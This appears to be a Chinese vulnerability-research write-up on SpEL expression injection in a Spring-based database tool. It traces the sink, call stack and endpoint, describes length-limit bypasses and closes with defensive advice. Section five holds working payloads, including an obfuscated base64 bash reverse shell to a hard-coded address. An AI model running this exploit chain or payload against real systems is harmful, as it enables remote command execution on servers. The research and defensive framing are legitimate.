SPEL 漏洞挖掘：从 SQL 插入到命令执行的深入分析与利用<\/h1>

一、SPEL 表达式注入漏洞概述<\/h2>
Spring Expression Language（SPEL）是 Spring 框架提供的表达式语言，用于在运行时查询和操作对象图。当应用程序使用 `StandardEvaluationContext<\/code> 而非安全的 SimpleEvaluationContext<\/code> 时，如果用户能够控制输入内容，就可能造成任意代码执行。<\/p>`

风险核心<\/h3>

StandardEvaluationContext<\/code> 支持全部 SPEL 语法，包括 Java 类型引用、构造函数和 bean 引用<\/li>
SimpleEvaluationContext<\/code> 仅支持 SPEL 语法子集，更安全<\/li>
SPEL 表达式可通过类类型表达式 T(Type)<\/code> 调用任意类方法<\/li>
<\/ul>
二、漏洞代码示例<\/h2>
import<\/span> org.springframework.expression.Expression;<\/span>
<\/span><\/span>import<\/span> org.springframework.expression.ExpressionParser;<\/span>
<\/span><\/span>import<\/span> org.springframework.expression.spel.standard.SpelExpressionParser;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> test_Class<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span>
<\/span><\/span>        ExpressionParser parser =<\/span> new<\/span> SpelExpressionParser();<\/span>
<\/span><\/span>        Expression exp1 =<\/span> parser.<\/span>parseExpression<\/span>(<\/span>"T(Runtime).getRuntime().exec(\"calc\")"<\/span>);<\/span>
<\/span><\/span>        Object obj =<\/span> exp1.<\/span>getValue<\/span>();<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>obj);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>三、漏洞挖掘与定位<\/h2>
1. Sink 点识别<\/h3>
寻找使用 SpelExpressionParser<\/code> 解析表达式的位置：<\/p>
protected<\/span> Object evaluateVariableExpression<\/span>(<\/span>Connection cn,<\/span> Table table,<\/span> Column column,<\/span> String value,<\/span>
<\/span><\/span>        NameExpression expression,<\/span> ExpressionEvaluationContext expressionEvaluationContext,<\/span>
<\/span><\/span>        List<<\/span>Object><\/span> expressionValues)<\/span> throws<\/span> Throwable {<\/span>
<\/span><\/span>    
<\/span><\/span>    Object expValue;<\/span>
<\/span><\/span>    org.<\/span>springframework<\/span>.<\/span>expression<\/span>.<\/span>Expression<\/span> spelExpression =<\/span> null<\/span>;<\/span>
<\/span><\/span>    
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        \/\/ 漏洞点：直接解析用户控制的表达式内容
<\/span><\/span><\/span><\/span>        spelExpression =<\/span> this<\/span>.<\/span>spelExpressionParser<\/span>.<\/span>parseExpression<\/span>(<\/span>expression.<\/span>getContent<\/span>());<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>Throwable t)<\/span> {<\/span>
<\/span><\/span>        \/\/ 异常处理逻辑
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        \/\/ 执行表达式
<\/span><\/span><\/span><\/span>        expValue =<\/span> spelExpression.<\/span>getValue<\/span>(<\/span>expressionEvaluationContext.<\/span>getVariableExpressionBean<\/span>());<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>Throwable t)<\/span> {<\/span>
<\/span><\/span>        \/\/ 异常处理逻辑
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    expressionValues.<\/span>add<\/span>(<\/span>expValue);<\/span>
<\/span><\/span>    expressionEvaluationContext.<\/span>putCachedValue<\/span>(<\/span>expression,<\/span> expValue);<\/span>
<\/span><\/span>    return<\/span> expValue;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. 调用栈分析<\/h3>
evaluateVariableExpression:324, ConversionSqlParamValueMapper
evaluateVariableExpressions:304, ConversionSqlParamValueMapper
resolveExpressionIf:253, ConversionSqlParamValueMapper
map:209, ConversionSqlParamValueMapper
mapToSqlParamValue:637, DefaultPersistenceManager
buildUniqueRecordCondition:548, DefaultPersistenceManager
get:350, DefaultPersistenceManager
execute:484, DataController$10
doExecute:207, AbstractSchemaConnTableController$VoidSchemaConnTableExecutor
view:492, DataController
doFilter:94, AnonymousAuthenticationFilterExt
doFilter:122, LoginLatchFilter
<\/code><\/pre>
3. Source 点定位<\/h3>
控制器端点：<\/p>
@RequestMapping<\/span>(<\/span>"\/{schemaId}\/{tableName}\/view"<\/span>)<\/span>
<\/span><\/span>public<\/span> String view<\/span>(<\/span>HttpServletRequest request,<\/span> HttpServletResponse response,<\/span>
<\/span><\/span>        org.<\/span>springframework<\/span>.<\/span>ui<\/span>.<\/span>Model<\/span> springModel,<\/span> @PathVariable<\/span>(<\/span>"schemaId"<\/span>)<\/span> String schemaId,<\/span>
<\/span><\/span>        @PathVariable<\/span>(<\/span>"tableName"<\/span>)<\/span> String tableName,<\/span> @RequestBody<\/span> Map<<\/span>String,<\/span> ?><\/span> paramData)<\/span> throws<\/span> Throwable {<\/span>
<\/span><\/span>    
<\/span><\/span>    final<\/span> User user =<\/span> WebUtils.<\/span>getUser<\/span>();<\/span>
<\/span><\/span>    final<\/span> Row row =<\/span> convertToRow(<\/span>paramData);<\/span> \/\/ 用户可控数据
<\/span><\/span><\/span><\/span>    \/\/ ... 后续处理
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>四、漏洞利用条件分析<\/h2>
1. 表达式格式要求<\/h3>
只有符合特定格式的输入才会被识别为表达式进行处理：<\/p>

表达式格式示例：${expression}<\/code><\/li>
系统通过 resolveNameExpressions<\/code> 方法处理输入<\/li>
只有匹配特定模式的内容才会被解析为表达式<\/li>
<\/ul>
2. 长度限制绕过技术<\/h3>
方法一：利用数据库字段长度限制差异<\/h4>

分析数据库表结构，寻找长度限制较宽的字段<\/li>
通过数据库管理工具查看字段类型和长度限制<\/li>
选择足够长的字段注入 SPEL 表达式<\/li>
示例：发现 address<\/code> 字段长度足够，注入恶意表达式<\/li>
<\/ol>
方法二：外部数据库连接绕过<\/h4>

搭建外部 MySQL 数据库：

修改 \/etc\/mysql\/mysql.conf.d\/mysqld.cnf<\/code>：
bind-address<\/span> =<\/span> 0.0.0.0<\/span>
<\/span><\/span><\/code><\/pre><\/li>
创建远程访问用户：
CREATE<\/span> USER<\/span> 'your_user'<\/span>@<\/span>'%'<\/span> IDENTIFIED BY<\/span> 'your_password'<\/span>;
<\/span><\/span>GRANT<\/span> ALL<\/span> PRIVILEGES<\/span> ON<\/span> *<\/span>.*<\/span> TO<\/span> 'your_user'<\/span>@<\/span>'%'<\/span>;
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
创建测试表并设置足够长的字段<\/li>
通过应用程序连接外部数据库<\/li>
在长字段中注入 SPEL 表达式<\/li>
<\/ol>
五、完整利用流程<\/h2>
步骤 1：识别注入点<\/h3>

找到接受用户输入并最终传递到 evaluateVariableExpression<\/code> 的功能点<\/li>
通常出现在数据查看、编辑或保存功能中<\/li>
<\/ul>
步骤 2：构造恶意表达式<\/h3>
\/\/ 计算器执行示例
<\/span><\/span><\/span><\/span>T(<\/span>Runtime).<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>)<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 反向shell示例（需根据环境调整）
<\/span><\/span><\/span><\/span>T(<\/span>Runtime).<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}"<\/span>)<\/span>
<\/span><\/span><\/code><\/pre>步骤 3：绕过长度限制<\/h3>

方法一：利用现有表中长度足够的字段<\/li>
方法二：通过外部数据库创建包含长字段的表<\/li>
<\/ul>
步骤 4：触发表达式执行<\/h3>

访问数据查看页面：\/{schemaId}\/{tableName}\/view<\/code><\/li>
确保包含恶意表达式的记录被查询和显示<\/li>
观察命令执行结果<\/li>
<\/ul>
六、防御建议<\/h2>
1. 使用安全的 EvaluationContext<\/h3>
\/\/ 不安全的用法
<\/span><\/span><\/span><\/span>StandardEvaluationContext context =<\/span> new<\/span> StandardEvaluationContext();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 安全的用法
<\/span><\/span><\/span><\/span>SimpleEvaluationContext context =<\/span> SimpleEvaluationContext.<\/span>forReadOnlyDataBinding<\/span>().<\/span>build<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>2. 输入验证和过滤<\/h3>

对用户输入进行严格的格式验证<\/li>
过滤或转义特殊字符和表达式语法<\/li>
<\/ul>
3. 最小权限原则<\/h3>

数据库用户应遵循最小权限原则<\/li>
禁止不必要的数据库操作权限<\/li>
<\/ul>
4. 表达式白名单<\/h3>

限制可执行的表达式类型和内容<\/li>
实施表达式内容安全检查<\/li>
<\/ul>
七、总结<\/h2>
本漏洞利用的关键在于：<\/p>

识别 SPEL 表达式注入的 sink 点<\/li>
追踪用户输入到漏洞点的数据流<\/li>
绕过输入长度限制的两种方法：

利用现有数据库字段长度差异<\/li>
通过外部数据库创建自定义表结构<\/li>
<\/ul>
<\/li>
构造并执行恶意 SPEL 表达式实现命令执行<\/li>
<\/ol>
这种漏洞挖掘过程体现了安全研究人员需要具备的创造性思维和 persistence（持久性），在遇到限制时不断寻找新的突破方法。<\/p>